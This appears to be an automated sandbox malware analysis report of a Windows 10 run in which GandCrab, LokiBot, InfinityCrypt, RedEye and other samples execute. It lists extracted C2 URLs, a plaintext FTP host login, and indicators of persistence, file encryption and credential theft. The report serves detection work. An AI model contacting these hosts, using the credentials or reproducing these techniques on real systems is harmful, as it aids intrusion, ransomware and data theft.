Resubmissions
29-12-2021 12:45
211229-py8v3sdddn 1029-12-2021 11:51
211229-n1lb5addbm 829-12-2021 11:50
211229-nzsptaegg6 129-12-2021 11:24
211229-nh59ksege9 128-12-2021 11:54
211228-n21s7sdgg2 828-12-2021 11:53
211228-n2tpwscdbj 128-12-2021 11:51
211228-nz82sscdaq 128-12-2021 11:38
211228-nryk4acdal 1028-12-2021 11:37
211228-nq735sdge9 1Analysis
-
max time kernel
434s -
max time network
465s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
29-12-2021 12:45
Static task
static1
URLScan task
urlscan1
Sample
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Behavioral task
behavioral1
Sample
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Resource
win10-en-20211208
Errors
General
-
Target
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Malware Config
Extracted
C:\NMOCWROPZB-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/6e509012a873ad6d
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
lokibot
http://blesblochem.com/two/gates1/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Fantom
Ransomware which hides encryption process behind fake Windows Update screen.
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
Processes:
rundll32.exeflow pid process 342 6228 rundll32.exe 365 6228 rundll32.exe 365 6228 rundll32.exe 408 6228 rundll32.exe 461 6228 rundll32.exe 500 6228 rundll32.exe 503 6228 rundll32.exe -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Disables RegEdit via registry modification
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
cmd.exeAzorult.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Executes dropped EXE 37 IoCs
Processes:
BabylonNG_setup.exesetup.exewini.exewinit.exerutserv.exerutserv.execheat.exerutserv.exeink.exerutserv.exetaskhost.exeP.exerfusclient.exerfusclient.exeR8.exemobsync.exewinlogon.exeConhost.execmd.exetaskhostw.exewinlogon.exeRDPWInst.exeConhost.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exeaudiodg.exeMicrosoftHost.exetaskhostw.exesywe.exesywe.exePioYkUIY.exeLSwIgkAg.exe1030.tmptaskhostw.exeWindowsUpdate.exepid process 1200 BabylonNG_setup.exe 1264 setup.exe 4140 wini.exe 5056 winit.exe 3952 rutserv.exe 4832 rutserv.exe 4728 cheat.exe 4812 rutserv.exe 4864 ink.exe 4352 rutserv.exe 4380 taskhost.exe 4620 P.exe 1316 rfusclient.exe 2724 rfusclient.exe 5096 R8.exe 940 mobsync.exe 3920 winlogon.exe 4992 Conhost.exe 3488 cmd.exe 5200 taskhostw.exe 7020 winlogon.exe 5168 RDPWInst.exe 6496 Conhost.exe 6760 software_reporter_tool.exe 5452 software_reporter_tool.exe 5344 software_reporter_tool.exe 1464 software_reporter_tool.exe 948 audiodg.exe 4628 MicrosoftHost.exe 6128 taskhostw.exe 5608 sywe.exe 7056 sywe.exe 5164 PioYkUIY.exe 6132 LSwIgkAg.exe 5684 1030.tmp 6400 taskhostw.exe 2096 WindowsUpdate.exe -
Modifies Installed Components in the registry 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
RedEye.exeInfinityCrypt.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\AddDisconnect.png.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\DenyStep.tiff.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\UnblockConvertFrom.tif.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\UnprotectLock.raw.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\AddDisconnect.png.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Users\Admin\Pictures\DisconnectProtect.tif.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Users\Admin\Pictures\FindSplit.crw.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Users\Admin\Pictures\DisconnectProtect.tif.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\FindSplit.crw.RedEye RedEye.exe File opened for modification C:\Users\Admin\Pictures\DenyStep.tiff.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Users\Admin\Pictures\UnblockConvertFrom.tif.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Users\Admin\Pictures\UnprotectLock.raw.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe -
Sets DLL path for service in the registry 2 TTPs
-
Sets file execution options in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PioYkUIY.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation PioYkUIY.exe -
Drops startup file 2 IoCs
Processes:
GandCrab.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\NMOCWROPZB-MANUAL.txt GandCrab.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\a873aa8da873ad6722.lock GandCrab.exe -
Loads dropped DLL 17 IoCs
Processes:
setup.exerundll32.exehelper.exesvchost.exesoftware_reporter_tool.exeregsvr32.exerundll32.exepid process 1264 setup.exe 4100 rundll32.exe 1264 setup.exe 4156 helper.exe 4156 helper.exe 4156 helper.exe 6764 svchost.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5344 software_reporter_tool.exe 5492 regsvr32.exe 6228 rundll32.exe 6228 rundll32.exe -
Modifies file permissions 1 TTPs 62 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 6736 icacls.exe 6376 icacls.exe 5580 icacls.exe 5680 icacls.exe 7028 icacls.exe 7164 icacls.exe 6308 icacls.exe 6000 icacls.exe 5672 icacls.exe 6756 icacls.exe 6776 icacls.exe 7116 icacls.exe 7128 icacls.exe 6944 icacls.exe 2432 icacls.exe 2096 icacls.exe 6844 icacls.exe 6400 icacls.exe 6488 icacls.exe 7108 icacls.exe 6848 icacls.exe 7028 icacls.exe 6496 icacls.exe 6768 icacls.exe 6548 icacls.exe 6804 icacls.exe 7012 icacls.exe 6556 icacls.exe 5608 icacls.exe 6940 icacls.exe 5708 icacls.exe 5140 icacls.exe 5724 icacls.exe 4556 icacls.exe 5960 icacls.exe 6948 icacls.exe 512 icacls.exe 6444 icacls.exe 5764 icacls.exe 6420 icacls.exe 4620 icacls.exe 6084 icacls.exe 6160 icacls.exe 7012 icacls.exe 6664 icacls.exe 6968 icacls.exe 4528 icacls.exe 6780 icacls.exe 6704 icacls.exe 6900 icacls.exe 4832 icacls.exe 6560 icacls.exe 6848 icacls.exe 6976 icacls.exe 7104 icacls.exe 5712 icacls.exe 6028 icacls.exe 5900 icacls.exe 2012 icacls.exe 6744 icacls.exe 6960 icacls.exe 3352 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/3620-125-0x0000000000BD0000-0x0000000000BE4000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
PioYkUIY.exeLSwIgkAg.exetaskhostw.exeexplorer.exeRedEye.exeViraLock.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\PioYkUIY.exe = "C:\\Users\\Admin\\fcIYAMws\\PioYkUIY.exe" PioYkUIY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LSwIgkAg.exe = "C:\\ProgramData\\PEkMcMgI\\LSwIgkAg.exe" LSwIgkAg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\{D96C1874-23D3-741B-5056-89006DF8340B} = "C:\\Users\\Admin\\AppData\\Roaming\\Bocit\\sywe.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe" RedEye.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe" RedEye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe" RedEye.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\PioYkUIY.exe = "C:\\Users\\Admin\\fcIYAMws\\PioYkUIY.exe" ViraLock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LSwIgkAg.exe = "C:\\ProgramData\\PEkMcMgI\\LSwIgkAg.exe" ViraLock.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run explorer.exe -
Processes:
setup.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
GandCrab.exeexplorer.exedescription ioc process File opened (read-only) \??\O: GandCrab.exe File opened (read-only) \??\Q: GandCrab.exe File opened (read-only) \??\T: GandCrab.exe File opened (read-only) \??\X: GandCrab.exe File opened (read-only) \??\E: GandCrab.exe File opened (read-only) \??\M: GandCrab.exe File opened (read-only) \??\N: GandCrab.exe File opened (read-only) \??\U: GandCrab.exe File opened (read-only) \??\V: GandCrab.exe File opened (read-only) \??\G: GandCrab.exe File opened (read-only) \??\I: GandCrab.exe File opened (read-only) \??\K: GandCrab.exe File opened (read-only) \??\L: GandCrab.exe File opened (read-only) \??\P: GandCrab.exe File opened (read-only) \??\A: GandCrab.exe File opened (read-only) \??\B: GandCrab.exe File opened (read-only) \??\F: GandCrab.exe File opened (read-only) \??\Y: GandCrab.exe File opened (read-only) \??\R: GandCrab.exe File opened (read-only) \??\S: GandCrab.exe File opened (read-only) \??\W: GandCrab.exe File opened (read-only) \??\Z: GandCrab.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\H: GandCrab.exe File opened (read-only) \??\J: GandCrab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
RDPWInst.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 8 IoCs
Processes:
schtasks.exePioYkUIY.exerutserv.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini schtasks.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol schtasks.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI schtasks.exe File created C:\Windows\SysWOW64\shell32.dll.exe PioYkUIY.exe File opened for modification C:\Windows\SysWOW64\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\System32\GroupPolicy schtasks.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
RedEye.exeGandCrab.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp" RedEye.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" GandCrab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 33 IoCs
Processes:
explorer.exesywe.exeWerFault.exeDllHost.exeDllHost.exetaskhostw.exeWerFault.exeWindowsUpdate.exepid process 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 1824 explorer.exe 7056 sywe.exe 7056 sywe.exe 7056 sywe.exe 7056 sywe.exe 7064 WerFault.exe 7064 WerFault.exe 7064 WerFault.exe 7064 WerFault.exe 4584 DllHost.exe 4584 DllHost.exe 4584 DllHost.exe 4584 DllHost.exe 7056 sywe.exe 5468 DllHost.exe 5468 DllHost.exe 5468 DllHost.exe 5468 DllHost.exe 6400 taskhostw.exe 6400 taskhostw.exe 6400 taskhostw.exe 6400 taskhostw.exe 6660 WerFault.exe 6660 WerFault.exe 6660 WerFault.exe 6660 WerFault.exe 2096 WindowsUpdate.exe 2096 WindowsUpdate.exe 2096 WindowsUpdate.exe 2096 WindowsUpdate.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Lokibot.exesatan.exesywe.exedescription pid process target process PID 3620 set thread context of 4348 3620 Lokibot.exe Lokibot.exe PID 2180 set thread context of 3400 2180 satan.exe satan.exe PID 5608 set thread context of 7056 5608 sywe.exe sywe.exe -
Drops file in Program Files directory 64 IoCs
Processes:
InfinityCrypt.exeGandCrab.exeattrib.exeFantom.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIDE.dll.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\PlayStore_icon.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files\CheckpointCompare.dotm GandCrab.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Windows Mail\msoe.dll.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons_retina.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AppStore_icon.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\plugin.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml Fantom.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-default_32.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_selected_18.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipsrus.xml Fantom.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nextarrow_default.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\ui-strings.js.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 